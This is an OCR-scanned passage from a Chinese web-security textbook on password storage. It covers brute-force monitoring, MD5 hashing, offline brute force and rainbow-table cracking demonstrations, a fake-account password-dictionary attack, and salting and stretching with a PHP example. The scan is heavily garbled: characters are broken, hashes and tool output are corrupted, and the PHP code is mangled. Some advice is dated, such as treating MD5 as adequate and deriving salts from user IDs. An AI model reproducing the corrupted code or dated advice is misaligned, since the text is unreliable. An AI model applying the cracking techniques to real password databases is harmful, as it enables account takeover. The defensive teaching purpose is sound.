发 生 密 码 暴 力 破 解 攻击 时 ， 登 录 失 败 率 (单位 时 间 内 登录 失败 次 数 + 尝试 登录 总 次 数 ) 一 
般 都 会 激增 。 所 以 如 果 定 时 检测 登录 失败 率 ， 管理 员 就 可 以 在 失败 率 激增 的 时 候 调 查 其 原因 。 如 
果 是 过 到 攻击 了 ,管理 员 可 以 通过 封 掉 远 程 IP 地 址 等 必要 的 措施 进行 处 理 ， 这 也 是 一 种 有 效 对 策 。 
































人 各 种 对 策 方法 的 比较 
下 面 总 结 一 下 到 目前 为 止 讲 过 的 各 种 对 策 的 优 缺 点 。 


表 5-2 ”解决 变种 暴力 破解 攻击 的 各 种 对 策 的 优 缺 点 



















































































优点 缺点 
严格 检查 密码 实现 、 部 署 简单 需要 花费 精力 去 创建 和 维护 密码 字典 / 不 能 算 作 完 美的 对 策 
隐藏 登录 ID 实现 、 部 署 简单 已 有 的 应 用 需要 变更 服务 设计 ， 实 现 起 来 有 一 定 难 度 。 
监视 登录 失败 率 对 所 有 密码 攻击 都 有 效果 需要 有 监视 人 员 ， 运 行 成 本 较 高 / 有 可 能 不 能 做 到 即时 响应 。 











上 面 所 列举 的 这 些 措 施 能 有 效 地 提高 系统 的 安全 性 ， 但 不 一 定 能 有 效应 对 其 漏洞 。 在 项 目 规 
划 阶 段 ， 需 要 综合 网 站 性 质 、 对 安全 性 的 要 求 、 项 目 成 本 等 方面 综合 考虑 ， 再 决定 是 否 需要 实施 
这 些 对 策 。 



































(D 也许 会 有 人 觉得 这 种 攻击 很 简单 ， 且 成 功率 很 高 ， 所 以 也 想 尝 试 一 下 ， 但 是 即使 不 是 出 于 恶意 ， 只 要 拿 着 别人 的 账 
号 密码 登录 了 ， 就 是 触犯 法 律 的 行为 ， 请 不 要 在 非 实验 环境 做 这 样 的 测试 。 
@ 不 确定 是 否 考 虑 到 安全 上 的 问题 才 这 样 设计 。 
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5.1.3 密码 保存 方法 


在 这 一 节 里 ,我 们 将 讲解 为 什么 需要 在 保存 密码 时 对 其 进行 加 密 保护 ， 以 及 可 以 采用 的 具 
方法 等 。 




















= 


体 


保护 密码 的 必要 性 

如 果 由 于 某 些 原因 导致 用 户 密码 泄露 ,那么 就 有 可 能 导致 用 户 密码 被 恶意 使 用 ， 从 而 给 用 
户 造 成 损失 。 一 旦 密码 泄露 ,很 可 能 导致 其 他 机 密 信息 也 汇 露 出 去 ， 甚 至 会 导致 信息 泄露 之 外 
的 损失 。 


利用 该 用 户 权 限 进行 购物 、 转 账 等 
利用 该 用 户 权 限 进行 信息 发 布 、 自 改 、 删 除 
如 果 用 户 在 多 个 网 站 使 用 同一 密码 的 话 ， 损 失 也 会 波及 到 其 他 网 站 
因此 ,为 了 防止 网 站 因为 SQL 注入 漏洞 等 导致 数据 库 信息 泄露 时 不 让 攻击 者 能 恶意 使 用 保 
存在 数据 库 中 的 密码 ， 就 需要 对 密码 采取 保护 措施 。 
典型 的 密码 保护 方法 包括 加 密 和 信息 摘要 (Message Digest ) (也 称 密码 学 级 别 的 散 列 值 ， 
Cryptographic Hash ) 
下 面 将 讲解 安全 的 密码 保存 方法 。 









































利用 加 密 方式 进行 密码 保护 及 其 注意 事项 
一 般 来 说 用 来 开发 Web 应 用 的 编程 语言 都 会 提供 用 来 加 密 的 库 ， 密 码 的 加 密 、 解 密 从 编码 
学 的 角度 来 说 都 不 是 什么 困难 的 事情 。 但 是 ， 实 际 进行 加 密 的 时 候 ， 有 以 下 儿 个 问题 需要 考虑 。 


选择 安全 的 加 密 算 法 

如 何 生 成 key 

如 何 管理 key 

加 密 算 法 退化 (Compromise ) 后 的 再 次 加 密 ? 


这 其 中 最 难 的 问题 是 key 的 保管 方法 。 由 于 每 次 登录 都 需要 key， 所 以 只 把 key 锁 在 安全 的 
保险 箱 里 是 不 可 行 的 。 而 且 既 要 确保 Web 应 用 能 正常 使 用 key， 还 要 确保 key 不 会 被 盗 取 ， 这 样 
的 系统 本 身 很 难 实现 。 退 一 步 说 ， 如 果 能 找到 理想 的 管理 key 的 方法 ,那么 也 可 以 用 这 种 方法 直 
接 来 管理 密码 。 

所 以 ， 现 实 中 几乎 不 采用 可 逆 加 密 的 方式 来 保护 密码 ， 更 多 情况 下 是 采用 下 面 将 要 说 明 的 信 



























































GD 加密 算法 的 退化 是 指 加 密 算法 被 破解 ， 或 者 随 着 计算 机 性 能 的 提升 ， 暴 力 破解 等 变 得 更 容易 实现 等 情况 。 这 里 所 说 
的 再 加 次 加 密 是 指 先 用 之 前 已 经 退化 的 算法 进行 解密 ， 再 使 用 新 的 安全 的 加 密 算法 进行 加 密 。 
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息 摘 要 的 方式 。 
专栏 : 数据 库 加 密 和 密码 保护 COLUMN 


现在 市 场 上 有 能 将 整个 数据 库 进 行 加 密 的 产品 。 其 中 大 部 分 的 产品 都 可 以 称 为 “透明 数据 加 
密 ”( TDE，Transparent Data Encryption )， 即 应 用 程序 开发 可 以 不 用 考虑 加 密 功 能 的 存在 。 

使 用 TDE 的 时 候 , 应 用 程序 只 是 使 用 普通 的 SOL 语句 ,数据库 引 擎 则 将 数据 加 密 后 进行 存储 。 
使 用 SELECT 等 语句 进行 数据 检索 时 ，TDE 会 自动 对 加 密 的 数据 进行 解密 操作 。 

使 用 TDE 数据 库 虽 然 很 简单 ， 但 是 它 并 不 适合 进行 密码 保护 。 其 原因 是 它 不 能 防御 类 似 
SQL 注入 这 样 的 攻击 。 因 为 TDE 的 透明 加 密 的 关系 ，SQL 注入 后 得 到 的 数据 都 是 被 解密 后 的 明 
文字 符 串 了 。 

TDE 数据 库 在 数据 库 的 文件 、 备 份 存档 等 被 盗 的 情况 下 , 可 以 有 效 保 护 数据 库 内 容 不 会 泄露 。 
































利用 信息 摘要 来 进行 密码 保护 及 其 注意 事项 
这 一 节 我 们 将 会 对 采用 信息 摘要 进行 密码 保护 的 方法 进行 说 明 。 


令 什么 是 信息 摘要 

能 将 任意 长 度 的 数据 (bit 数组 ) 压缩 为 固定 长 度 (信息 摘要 ,或 者 叫 作 散 列 值 ) 的 函数 
叫 作 散 列 函数 ， 满 足 安全 上 要 求 (参考 后 面 的 专栏 ) 的 散 列 函数 叫 作 密码 学 级 别 的 散 列 函数 
( Cryptographic Hash Function )。 在 后 面 的 章节 中 我 们 将 简称 为 散 列 函 数 。 

我 们 下 面 来 看 一 下 几 个 信息 摘要 的 例子 。 手 头 有 SSH 客户 端 软件 的 用 户 可 以 登录 本 书 中 
实验 用 的 虚拟 机 ， 然 后 输入 下 面 带 下 划 线 部 分 的 命令 。 输 入 命令 行 的 下 一 行 白 底 黑 字 的 内 容 是 
MD5 散 列 函数 的 输出 结果 。 


会 程序 示例 ”使 用 md5sum 进行 散 列 值 计算 


wasbook@wasbook:~$ echo -n passwordl | md5sum 


7c6al80b36896a0a8c02787eeafb0e4c” 


wasbook@wasbook:~$ echo -n password2 | md5sum 
6cb75£652a9b52798eb6cf2201057c73， 
Mllelele) doit elele) ,SE 





其 中 “echo -n” 是 在 echo 内 容 后 不 输出 回 车 符 ，md5sum 是 用 来 对 给 定 文件 或 者 标准 输入 
进行 散 列 值 计算 的 命令 。 

上 面 的 例子 分 别 对 “password1” 和 “password2” 做 了 散 列 值 计算 ， 从 计算 结果 可 以 看 出 ， 
虽然 这 两 个 字符 串 只 有 一 个 字符 不 一 样 ,但 是 计算 出 来 的 结果 却 相差 其 远 。 
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专栏 : 密码 学 级 别 的 散 列 函数 需要 满足 的 要 求 COLUMN 


令 原 像 计 算 困 难 性 ( Pre-image Resistance ) 
原 像 计算 困难 性 是 指 在 现实 的 可 接受 时 间 内 从 散 列 值 反 推出 原 内 容 的 困难 程度 。 原 像 计 算 藉 
难 性 也 叫 作 单 向 性 。 
令 第 2 原 像 计 算 困 难 性 ( Second Pre-image Resistance ) 
第 2 原 像 计算 困难 性 是 指 给 定 原 数据 ， 在 现实 的 可 接受 时 间 内 找 出 相同 散 列 值 的 其 他 数据 的 
和 难 程度 。 第 2 原 像 计 算 困 难 性 也 称 为 弱 耐 冲突 性 
















































































































































































Weak Collision Resistance )。 














令 冲突 困难 性 ( Collision Resistance ) 

冲突 困难 性 是 指 找 出 拥有 相同 散 列 值 的 两 个 不 同 数据 的 困难 程度 。 原 数据 之 间 并 没有 什么 关 
联 ， 条 件 是 散 列 值 相同 即 可 。 冲 突 困 难 性 也 称 为 强 耐 冲突 性 ( Strong Collision Resistance )。 

广泛 使 用 至 今 的 MD5 散 列 函数 已 经 被 证 明 是 不 满足 强 耐 冲突 性 性 的 ， 可 以 说 弱 耐 冲突 性 被 
攻破 也 只 是 时 间 的 问题 。 但 是 如 果 仅 用 作 保 护 密码 安全 的 话 , 能 保证 原 像 计算 困难 性 已 经 足够 了 。 
也 就 是 说 ，MD5 散 列 函数 还 是 能 继续 作为 保护 密码 安全 之 用 的 。 
但 是 根据 目的 去 选择 合适 的 散 列 函数 可 能 会 比较 困难 ， 如 果 选 择 不 当 ， 还 可 能 带 带 来 安全 隐 
患 。 所 以 我 们 可 以 不 用 考虑 具体 的 使 用 场景 ， 而 是 选择 那些 通用 的 、 安 全 的 散 列 算法 就 可 以 了 。 
比如 SHA-256 就 是 一 个 不 错 的 选择 。 






























































































































































































































































令 利用 信息 摘要 保护 密码 
图 5-7 简单 说 明了 使 用 信息 摘要 的 密码 保存 和 验证 的 方法 。 如 图 所 示 ， 数据 库 中 保存 的 不 再 
是 密码 原文 而 是 其 散 列 值 ， 登 录 时 验证 的 也 是 原 密码 的 散 列 值 。 


图 5-7 利用 散 列 保存 和 验证 密码 



























































设置 密码 
29#w2k! Bd :数据库 
散 列 c2 ed 07 a6 cd 
保存 
a4 89 27 b6 2f 

登录 时 C2 ed 07 a6 cd 

a4 89 27 b6 2f ee 
2 散 列 c2 ed 07 a6 cd 验证 

















之 所 以 对 密码 原文 采用 信息 摘要 能 保护 密码 安全 ， 是 因为 散 列 函数 具有 下 面 的 特性 。 单 向 性 
和 冲突 困难 性 的 详细 定义 请 参考 之 前 的 专栏 。 
不 能 从 散 列 值 倒 推出 明文 密码 ( 单 向 性 ) 
不 同 的 密码 生成 相同 的 散 列 值 的 概率 非常 低 ( 冲突 困难 性 ) 
尽管 散 列 函数 满足 安全 性 上 的 那些 需求 ,但 是 由 于 密码 的 字符 种 类 和 长 度 都 是 有 限 的 ， 所 以 
还 是 有 一 些 方法 能 实现 根据 散 列 值得 到 原来 的 密码 。 这 里 我 们 选择 其 中 的 3 种 方法 来 介绍 一 下 。 
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令 威胁 1: 离线 暴力 破解 

在 这 之 前 我 们 已 经 说 过 了 散 列 函数 不 能 从 散 列 值得 到 原来 的 数据 ， 但 是 那 只 适用 于 一 般 情 
况 ， 对 于 密码 来 说 就 不 合适 了 。 由 于 在 密码 中 使 用 的 字符 种 类 有 限 ， 且 长 度 也 有 限 ， 所 以 有 时 候 
通过 暴力 破解 是 可 以 得 到 原 密码 的 。 

男 外 ， 对 散 列 函数 还 有 一 个 要 求 就 是 处 理 速 度 要 足够 快 ， 因 为 散 列 函数 的 典型 利用 场景 是 为 
DVD-ROM 等 巨大 ISO 文件 做 信息 摘要 ,计算 其 散 列 值 的 。 考 虑 到 我 们 会 频繁 地 使 用 散 列 函数 
来 计算 散 列 值 ， 如 果 计 算 过 程 花费 时 间 过 长 的 话 ， 其 至 可 能 会 对 系统 性 能 产生 影响 。 所 以 散 列 函 

但 是 散 列 函数 速度 过 快 对 密码 做 信息 摘要 来 说 有 可 能 是 一 种 灾难 ， 因 为 处 理 速度 提高 了 ,也 
使 得 暴力 破解 的 效率 变 高 ， 增 加 暴力 破解 成 功 的 可 能 性 。 

这 种 攻击 在 从 散 列 值 反 推 出 原文 的 时 候 并 不 需要 连接 到 服务 器 ( Offline )， 所 以 也 叫 作 离线 
苦力 破解 攻击 。 

下 面 介绍 下 笔者 做 的 一 个 小 实验 的 结果 。 在 实验 中 使 用 了 md5brute” 这 个 用 来 从 MD5 散 列 
值 查找 原文 的 工具 。 在 长 度 是 8 位 的 小 写 英文 字母 这 一 测试 条 件 下 ， 查 找 “zzzzzzzz” 的 散 列 
值 。 按 字母 顺序 排列 的 话 ， 这 个 字符 串 排 在 最 后 。 


这 运行 实例 从 散 列 值 倒 推 出 原 字符 串 的 例子 





$ echo -n zzzzzzzz | md5sum 

Bellit0GaEbo ba Ome SA La dCCeeag RE 

$ time ./md5brute abcdefghijklmnopqrstuvwxyz ¥ 
bc1llf06afb9b27070673471a23ecc6a9 

Anti-WMAC MD5BRUTE by Taka John Brunkhorst 


Hash match found!! 
[EPE 到 ] [bc11f06afbo9b27070673471a23ecc6a9] 
Thank you for using Anti-WMAC MD5BRUTE! exitingl 


real 2518m59.192s 
USEer 25U6m3 D0l38 
SYS 0m9 .7458 


$ 





在 系统 配置 为 Pentium Dual-Core 2GHz 的 机 器 上 ， 如 果 只 使 用 单 核 ( Core ) 进行 测试 的 话 ， 
大 概 只 需要 花费 40 个 小 时 就 能 成 功 地 查找 到 该 散 列 值 对 应 的 密码 原文 。 平 均 算 下 来 大 概 一 个 小 
时 能 进行 138 万 次 散 列 值 计算 。 


QD http:/www.vector.co.jp/soft/unix/util/se365582.html 
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基于 此 实验 数据 ， 如 果 用 大 小 写 英文 字母 加 上 数字 作为 密码 ， 长 度 为 8 位 的 话 ， 需 要 大 概 5 
年 才能 找到 原文 。5 年 看 上 去 时 间 很 长 了 ,但 是 如 果 使 用 676 核 的 集群 的 话 ， 只 需要 3 天 就 能 
破解 出 原文 了 。 

也 就 是 说 ， 如 果 密 码 长 度 在 8 位 以 下 的 话 ， 以 现在 的 CPU 能 力 来 说 ， 还 是 可 以 在 可 接受 范 
围 内 从 散 列 值得 到 密码 原文 的 。 而 且 破 解 并 没有 利用 MD5 的 漏洞 等 ， 其 他 的 散 列 函数 ( SHA-1 
或 SHA-256 ) 也 存在 同样 的 问题 。 

上 面 只 是 暴力 破解 的 例子 ， 利 用 字典 攻击 也 能 得 到 散 列 值 的 原 字 符 串 ， 如 果 该 字符 串 已 经 在 
字典 里 存在 的 话 ， 其 至 可 以 瞬间 (1 秒 以 内 ) 破解 。 

后 来 ， 为 了 更 高 效 的 从 散 列 值得 到 原文 ， 有 人 发 明了 利用 彩虹 表 进 行 破解 的 方法 。 


人 威胁 2: 彩虹 破解 (Rainbow Crack ) 

我 们 还 可 以 考虑 另 一 种 办 法 来 提高 从 散 列 值得 到 密码 原文 的 效率 ， 即 预先 使 用 暴力 破解 的 方 
法 生成 一 个 散 列 值 查找 表 ， 解 析 原 密码 的 时 候 如 果 能 查询 到 这 个 表 的 话 ， 就 能 实现 高 速 的 密码 解 
析 工 作 。 但 实际 上 由 于 密码 组 合 数量 庞大 ， 基 本 上 创建 这 样 一 个 查找 表 是 很 很 困难 的 。 

然而 到 了 2003 年 ， 一 种 基于 彩虹 表 ( Rainbow Table ) 的 方法 出 现 了 ， 它 使 得 创建 一 个 可 接 
受 大 小 的 查找 表 成 为 可 能 。 后 面 的 “参考 : 彩虹 表 原理 ”小 节 有 针对 彩虹 表 的 详细 说 明 ， 各 位 读 
者 可 以 参考 。 这 里 我 们 通过 实验 来 看 一 下 彩虹 表 破 解 是 如 何 利 用 彩虹 表 来 解析 出 密码 原文 的 。 

彩虹 表 需 要 为 不 同 的 字符 种 类 和 字符 串 长 度 创建 不 同 的 查找 表 ， 如 果 字 符 种 类 或 字符 串 长 度 
增加 ， 彩 虹 表 大 小 也 会 急速 变 大 。 笔 者 手头 上 的 彩虹 表 是 适用 于 密码 为 7 位 以 下 的 小 写字 母 加 数 
字 的 密码 ， 我 们 将 使 用 这 个 彩虹 表 来 进行 实验 。 这 里 使 用 的 工具 rcrack.exe 可 以 从 RainbowCrack 
Project2 下 载 ， 


和 合 运行 实例 “Rainbow Crack 的 例子 


GeTacK ex Yrxxxxe rt nfoOeerba30bbddesaedee rasyetdedst 
md5_ loweralpha-numeric#1-7 0 2400xX40000000 all.rt: 

640000000 bytes read, disk access time: 20.02 s 

WET En he le 

searching for 1 hasn... 

cryptanalysis time: 3.56 S 


md5 loweralpha-numeric#1-7 1 2400x40000000 all.rt: 
e4000oo0o ytes read qskiacceses Gumer Loons 
WT el 


searching for 1 hasn... 
plaintext of f0Oe8fb430bbdde6ae9c879a51l8fd895f is ZZZZZZZ 





中 ”这 个 数字 是 2010 年 象棋 电脑 程序 “ 阿 迦 罗 2010” 战 胜 日 本 女 棋 王 时 的 CPU 的 核 数 。 
@ http://project-rainbowcrack.com/ 





cryptanalysis time: 1.34 S 
statistics 


Plarntext tou: or (L000 


total disk access time: 39.92 5s 


total chain walk step: 3811429 
Eotaln tealse ala T8273 
total chain walk step due to false alarm: 1861700 


f0e8fb430bbdde6ae9c879a518fd895f EE hex:7a7la7la7a7a7Ta7a 
GA 





从 上 面 的 例子 可 以 看 出 ，Rainbow Crack 只 用 了 45 秒 就 把 密码 原文 给 解析 出 来 了 。 相 比 之 
下 同样 的 散 列 值 ， 之 前 介绍 的 md5brute 用 了 997 分 钟 ， 使 用 彩虹 的 表 速 度 足 足 是 md5brute 的 
1300 信之 多 。 不 过 这 个 实验 对 md5brute 来 说 有 点 不 公平 (我们 使 用 的 明文 字符 串 排 在 所 有 字 
符 组 合 的 最 后 )， 实 际 用 起 来 应 该 不 会 有 这 么 大 的 差别 ,但 是 这 也 充分 说 明 彩 虹 表 的 高 效 性 和 实 
用 性 了 。 

RainbowCrack Project 的 主页 也 在 出 售 彩虹 表 数 据 ， 比 如 用 户 MD5 算法 的 彩虹 表 ， 我 们 可 以 买 
到 8 位 以 下 所 有 ASCI 字符 , 以 及 10 位 以 下 小 写字 母 加 数字 的 彩虹 表 "。 从 理论 上 说 , 如 果 密 人 码 只 
是 简单 地 进行 散 列 处 理 后 保存 的 话 ， 我 们 用 这 些 彩虹 表 就 可 以 在 很 短 的 时 间 内 破解 出 原 密码 。? 

抵御 彩虹 表 攻 击 的 最 简单 的 方法 就 是 增加 密码 长 度 ， 现 在 能 获取 的 彩虹 表 支 持 的 最 大 长 度 都 
只 有 10 位 左右 ， 如 果 我 们 把 密码 长 度 设置 为 20 个 字符 以 上 ， 就 可 以 预防 用 目前 的 彩虹 表 破 解 原 
密码 的 问题 。 但 是 强制 用 户 使 用 20 多 位 的 密码 也 有 点 不 太 现实 ， 所 以 可 以 采用 后 面 将 要 介绍 的 
加 salt 取 散 列 值 的 对 策 。 


4 威胁 3: 在 用 户 数据 库 里 创建 密码 字典 

也 许 我 们 会 觉得 如 果 使 用 攻击 者 未 知 的 散 列 函 数 ， 攻 击 者 应 该 就 没有 办 法 计算 出 原 密码 了 ， 
但 是 实际 上 即使 攻击 者 不 知道 保存 密码 时 所 使 用 的 散 列 函数 ， 也 有 其 他 方法 能 解析 出 原 密码 。 

这 种 方法 就 是 通过 在 被 攻击 目标 系统 里 注册 大 量 的 僵尸 ( Dummy ) 用 户 ， 在 系统 的 数据 库 里 
制作 一 个 “密码 字典 ”出 来 。 图 5-8 是 这 种 攻击 的 大 概 流程 。 





QD http://project-rainbowcrack.com/buy.php 
@ 根据 RainbowCrack Project 的 测试 数据 ， 破 解 一 个 密码 最 长 也 只 需要 202 秒 。 


5.1 认证 | 277 





图 5-8 在 Web 应 用 数据 库 中 创建 密码 字典 


C@) 资 取 用 户 数据 库 

























































































到 四 密码 的 散 列 值 
用 户 ID 过 而 taro 605725flt0c9e 
ET Seoword | mm jiro 85c70d97880d 
- 卫 中 注册 僵尸 帐 号 saburo a6d55c9597f£3 a 
evil2 123456 (8) saburo 和 
hanako 401c8c6495b2 
evil3 qwerty ; evil2 的 散 
cv a evill 06fc35c95e55 列 值 相同 
evil2 a6d55c9597f3 
evil3 C8245907ea71 
evil4 a89d9d39d08e 














(4) saburo 的 密码 是 123456 




















如 图 5-8 说 明 的 那样 ， 攻 击 者 首先 在 攻击 对 象 系统 中 注册 大 量 的 虚假 账号 (GD )， 然 后 再 利 
用 其 他 方法 ( 比如 SQL 注入 攻击 等 )， 盗 取 系 统 的 用 户 数据 库 (C@) )。 在 取得 的 用 户 数据 库 里 ， 查 
看 保存 散 列 密码 的 那 一 列 的 数据 ， 寻 找 具 有 和 在 中 里 注册 的 用 户 相 同 散 列 值 的 记录 ， 在 图 5-8 的 
例子 里 ， 用 户 saburo 和 evil2 的 密码 散 列 值 相同 (@@) )， 因 为 evil2 的 密码 是 123456， 所 以 可 以 断 
定 saburo 的 密码 也 是 123456 (由 )。 

针对 这 种 攻击 ， 加 盐 也 是 一 种 有 效 的 防御 手段 。 


令 如 何 防止 散 列 值 被 破解 
很 多 人 认为 将 密码 作为 散 列 值 的 形式 保存 起 来 就 安全 了 ， 但 实际 上 有 各 种 各 样 的 方法 可 以 
破解 散 列 密码 ， 在 上 面 我 们 已 经 介绍 过 了 。 之 前 介绍 的 方法 都 是 恶意 利用 特定 的 散 列 函数 ( 比如 
MD5 ) 的 特点 及 漏洞 等 。 只 要 是 使 用 算法 公开 的 散 列 函数 ， 基 本 上 都 会 面临 同样 的 问题 。 
之 前 介绍 的 方法 ， 都 是 密码 组 合 模式 数量 不 是 特别 大 的 情形 下 发 生 的 破解 ， 如 果 使 用 20 位 
以 上 的 随机 数 的 话 ， 我 们 可 以 认为 基本 上 密码 不 会 被 破解 。 但 是 这 样 的 密码 使 用 起 来 非常 地 不 
便 ， 现 实 中 也 不 可 能 被 采用 ， 现 实 中 使 用 最 多 的 密码 长 度 在 8 位 左右 ， 所 以 我 们 要 寻找 防止 散 列 
值 被 破解 的 方法 。 
基本 的 防止 散 列 值 被 破解 方法 有 下 面 两 种 : 
salt (加 盐 ) 
stretching ( 延展 计算 ) 









































令 对策 1: salt ( 加 盐 ) 

salt 指 的 是 在 原本 要 散 列 的 数据 后 面 追加 的 内 容 。 加 上 了 salt， 除 了 看 上 去 密码 字符 串 会 变 
长 之 外 ,， 还 因为 每 个 用 户 的 salt 都 不 一 样 ， 所 以 即使 两 个 用 户 的 密码 相同 ， 也 能 为 这 两 个 用 户 的 
密码 生成 不 同 的 散 列 值 。 

安全 的 使 用 salt 需要 满足 以 下 条 件 : 


确保 有 一 定 的 长 度 
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每 个 用 户 使 用 不 同 的 salt 


这 其 中 “一 定 长 度 ” 的 说 法 可 能 有 些 模 楼 两 可 ， 实 际 上 考虑 到 对 抗 彩 虹 表 攻击 ，salt 和 密码 
加 起 来 的 长 度 至 少 要 保证 在 20 位 以 上 。 

不 同 用 户 使 用 不 同 salt 的 原因 ， 是 让 使 用 相同 密码 的 用 户 也 能 生成 不 同 的 散 列 值 。 为 不 同 用 
户 生成 不 同 的 salt 有 两 种 方法 。 


使 用 随机 数 作为 salt 
使 用 以 用 户 ID 为 输入 参数 的 函数 来 生成 salt 


很 多 教材 中 都 推荐 使 用 随机 数 作为 salt 使 用 ， 因 为 使 用 随机 数 作为 salt 的 话 ， 必 须 将 salt 也 
保存 在 数据 库 里 。 如 果 不 知 道 salt 的 话 ， 就 不 能 验证 密码 是 否 正 确 了 。 

另 一 种 方法 ， 如 果 使 用 以 用 户 ID 为 输入 参数 的 也 数 的 话 ， 就 不 需要 保存 salt 了 ， 这 是 该 方 
法 的 一 个 优点 ， 和 随机 数 比较 起 来 ， 该 方法 没有 明显 的 缺点 。 因 此 本 书 里 比较 推荐 使 用 基于 用 户 
ID 的 函数 来 产生 salt 值 。salt 的 实现 例子 可 以 参考 后 面 的 实现 示例 。 


















































令 对 策 2: stretching ( 延展 计算 ) 

即使 使 用 salt， 也 不 能 降低 暴力 破解 带 来 的 危险 。 因 为 即使 加 上 salt， 也 不 会 影响 计算 散 列 
值 所 需要 的 时 间 。 为 了 对 抗 妈 力 破解 ， 需 要 让 散 列 计算 处 理 速度 变 慢 。 

stretching ( 延展 计算 ) 是 一 种 利用 现 有 的 MD5 或 者 SHA-1、SHA-256 等 散 列 函数 ， 想 办 法 
增加 计算 散 列 值 所 需要 时 间 的 一 种 方法 。 它 通过 反复 递归 的 调用 散 列 函数 来 增加 计算 时 间 。 具 体 
的 实现 方法 请 参考 下 一 小 节 。 


























令 实现 示例 
下 面 的 脚本 是 在 上 文 的 基础 上 ， 用 来 计算 散 列 值 的 一 个 示例 。 


代码 清单 ”/51/51-001.php 











<?php 
// FIXEDSALT 要 根据 实际 情况 进行 修改 
define ('FIXEDSALT' 1!'bc578d1503b4602a590d8f8ce4a8e634a55bec0d'); 


define('STRETCHCOUNT', 1000); 











// 生成 salt 
function get salt ($id) { 
return $id . pack('H*',，FIXEDSALT); // 将 用 户 的 ID 和 固定 字符 串 连 接 起 来 























} 


function get password hash($id, $pwd) { 
$salt = get salt ($id); 
$hash = ''; // 默认 的 散 列 值 
for (Si 0; $i < STRETCHCOUNT; S$i++) { 
shash hash('sha256', S$hash . S$pwd . $salt); // stretching 


} 
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return S$hash; 


} 
// 调用 示例 























var dump (get password hash('userl', 'pass1')); 

var dump (get password hash('userl', 'pass2')); 

var dump (get password hash('user2', 'pass1')); 
执行 结果 





string(64) "a44812a099b40ee49ffe2bd6c5de7403a1l854e009ba9e2b417b9770d4ffac54b" 
string(64) "cc2c26c9a22d7318f48ed99e8915c6861559ade98e4df3dab64e51lc7ea476389" 
string(64) "3fca4aabé6f7bf9ed2ac855dbc0e22c1l48e7e23a1l37c497777ele9269902571c8" 





























get_salt 方法 的 输入 参数 为 用 户 ID ， 返 回 值 是 用 于 散 列 计算 的 salt。 例 子 里 只 是 简单 地 将 
用 户 ID 和 固定 字符 串 用 pack 隐 数 从 十 六 进 制 转换 为 二 进 制 数据 后 连接 在 一 起 。 通 过 使 用 二 进 
制 数 据 ， 可 以 达到 增加 字符 种 类 的 效果 。 

get_password_hash 方法 里 面 将 密码 原文 和 salt 连 起 来 后 用 SHA-256 算法 进行 了 1000 
次 的 计算 ”, 这 里 之 所 以 使 用 SHA-256, 是 因为 它 是 目前 来 说 比较 安全 的 用 在 密码 保存 及 其 他 领域 
的 散 列 函数 之 一 。 

如 果 每 次 调用 get password hash 方法 时 传递 的 $id 和 $spwa 参数 的 值 都 是 一 样 的 话 ， 
这 个 方法 的 返回 值 也 会 每 次 都 一 样 ， 所 以 不 需要 在 数据 库 里 再 额外 保存 salt 的 值 。 

stretching 次 数 (这 里 是 1000 次 ) 越 高 的 话 ， 对 暴力 破解 等 攻击 的 抵抗 能 力 就 越 强 。 当 然 它 
也 有 不 利 的 一 面 ， 就 是 与 此 同时 它 也 会 给 服务 央 带 来 更 高 的 负荷 。 如 果 负 和 荷 过 高 ， 则 会 给 正常 业 
务 带 来 影响 ， 甚 至 可 能 被 人 利用 来 发 动 DoS 攻击 。 所 以 这 个 stretching 次 数 需 要 一 边 观察 服务 顺 
负荷 情况 一 边 进行 调整 ， 最 后 选择 一 个 合适 的 值 。 






































四 关于 stretching 方法 的 更 多 内 容 请 参考 Cryptography Engineering[1]。 
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专栏 : 密码 泄露 途径 COLUMN 


























密码 数据 泄漏 途径 很 多 ， 除 了 前 面 我 们 已 经 介绍 的 SQL 注入 攻击 、 密 码 尝 试 、 社 会 化 攻击 、 
钓鱼 攻击 等 ， 这 里 我 们 再 介绍 一 下 其 他 可 能 造成 密码 泄露 的 行为 。 
多 备份 数据 被 盗 、 丢 失 
备份 数据 里 可 能 会 包含 密码 等 机 密 信 息 ， 如 果 这 些 媒体 ( 硬盘 、 磁 带 ) 丢失 或 者 流出 到 外 部 
的 话 ， 就 会 造成 密码 泄露 。 


4 硬盘 等 被 盗 、 丢 失 

如 果 服 务 器 、 硬 盘 等 从 数据 中 心 被 偷 走 的 话 ， 也 会 造成 信息 泄漏 。 虽 然 机 器 从 机 房 被 偷 走 有 
点 令 人 难以 置信 ， 但 是 硬盘 被 资 的 先例 在 现实 世界 中 确实 是 发 生 过 的 。 针 对 硬盘 被 盗 的 情况 ， 之 
前 介绍 过 的 TDE 型 数据 库 是 一 种 很 好 的 解决 对 策 。 
4 内 部 操作 人 员 将 数据 带 出 
在 数据 中 心机 房 或 者 办 公 室 里 的 内 部 操作 人 员 ， 可 以 通过 数据 库 管理 工具 等 把 数据 抽出 ， 再 
USB 或 者 光盘 之 类 的 媒体 带 到 公司 外 部 ， 导 致 信息 泄露 。 此 类 事件 频 有 发 生 ， 媒 体 中 也 经 党 
报道 。 
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5.1.4 自动 登录 


现在 很 多 Web 应 用 都 会 在 登录 页 面 提供 “自动 登录 ”或 者 “保持 登录 状态 ”这 样 的 复 选 杠 
( 如 图 5-9 )， 如 果 用 户 选 中 自动 登录 ,那么 即使 重启 浏览 器 ， 系 统 也 会 自动 进行 登录 ， 而 不 必 再 
次 输入 用 户 名 和 密码 。 

图 5-9 自动 登录 复 选 框 示例 


Facebook 登录 








保持 登录 状态 -ee 
EE i racebook 
从 系统 安全 的 角度 考虑 ，_ 直 以 来 大 家 都 认为 自动 登录 是 对 安全 不 利 的 。 比 如 会 话 持续 时 间 
变 长 的 话 ， 就 会 增加 受到 类 似 XSS 等 被 动 攻击 的 概率 。 
但 是 笔者 认为 ， 根 据 目前 网 站 的 现状 及 自身 的 特点 ， 是 可 以 选择 提供 自动 登录 功能 的 。 其 原 
因 有 以 下 几 点 。 


随 着 Web 应 用 的 深入 普及 ,需要 保持 登录 状态 的 服务 增加 了 ( 比如 Google 等 ) 
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频繁 的 登录 、 退 出 操作 ， 容 易 迫 使 用 户 选择 更 加 简单 的 密码 ， 反 而 使 得 系统 的 危险 系数 
增加 











下 面 我 们 说 一 下 怎么 才能 安全 地 实现 自动 登录 功能 。 但 是 在 这 之 前 ， 作 为 反例 ， 我 们 先 看 看 
自动 登录 中 一 些 比较 危险 的 实现 方式 。 


危险 的 实现 方式 示例 





下 面 是 一 个 实现 方式 不 正确 的 网 站 的 例子 ， 它 把 用 户 名 和 自动 登录 标识 都 保存 到 Cookie 里 
